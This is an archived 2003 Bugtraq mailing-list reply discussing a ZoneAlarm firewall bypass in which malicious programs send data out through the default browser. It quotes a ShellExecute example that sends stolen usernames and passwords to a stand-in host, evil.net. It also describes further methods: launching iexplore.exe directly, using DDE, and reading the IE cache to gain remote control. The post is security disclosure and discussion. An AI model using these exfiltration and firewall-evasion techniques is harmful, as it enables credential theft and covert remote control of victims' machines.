Re: Bypassing ZoneAlarm (limited)
From: Dan Harkless (bugtraq_at_harkless.org)
Date: 07/03/03
- Previous message: Bill Moran: "Re: MacOSX - crash screensaver locked with password and get the desktop back"
- Maybe in reply to: Te Smith: "Re: Bypassing ZoneAlarm (limited)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: bugtraq@securityfocus.com Date: Thu, 03 Jul 2003 11:57:27 -0700
While I was being interviewed for an InfoSecurityMag.com article on this (in
which the author unfortunately got multiple fundamental facts wrong), I
thought of a couple of other points that are probably worth mentioning.
<aceh@gyuvetch.bg> writes:
> Windows dll shell32.dll exports a well known and documented function called
> ShellExecute. From Win32 Programmer's refference:
>
> >HINSTANCE ShellExecute(
> > HWND hwnd, // handle to parent window
> > LPCTSTR lpOperation, // pointer to string that specifies
> > // operation to perform
> > LPCTSTR lpFile, // pointer to filename or folder name string
> > LPCTSTR lpParameters, // pointer to string that specifies
> > //executable-file parameters
> > LPCTSTR lpDirectory, // pointer to string that specifies default
> directory
> > INT nShowCmd // whether file is shown when opened
> > );
>
> When the lpFile parameter is an Internet url, windows invokes Internet
> Explorer (or more accurately - the default web browser), which in 99% of
> the cases is allowed to access Internet, with that url. Example:
>
> ShellExecute(
> 0,
> "open",
> "http://evil.net/collect.cgiun=stolen_username&pw=stollen_password"
> 0,
> 0,
> SW_HIDE //This doesn't work.
> //I think it is supposed to hide the window but ...
> );
The level of detail you're going into on ShellExecute() kind of implies the
vulnerability is limited to that one system call, but of course a malicious
executable could directly run iexplore.exe or any other executable that
allows opening arbitrary URLs, and pass those URLs via the commandline or
via other means like DDE.
> The info leaked is limited by the maximum allowed url length, but that
> could be more than enough for a malicious application to send some
> username/password/cookie/cc_number info to malicious server.
And the vulnerability wouldn't be limited to simplex communications from
host to server. The trojan could employ techniques (as simple as reading
Internet Explorer cache files) to establish half-duplex communications,
potentially allowing an attacker to gain remote control over your machine
despite the presence of ZoneAlarm.
Of course if a trojan is able to run arbitrary commands with your user
privileges (especially if you're in the Administrators group, as, for
instance, the initial account created on Windows XP boxes is), there are
other ways an attacker could gain control of your machine. Particularly if
you're running only ZoneAlarm rather than ZoneAlarm Plus or Pro, since it
doesn't notice DLLs getting changed.
-- Dan Harkless bugtraq@harkless.org http://harkless.org/dan/
- Previous message: Bill Moran: "Re: MacOSX - crash screensaver locked with password and get the desktop back"
- Maybe in reply to: Te Smith: "Re: Bypassing ZoneAlarm (limited)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
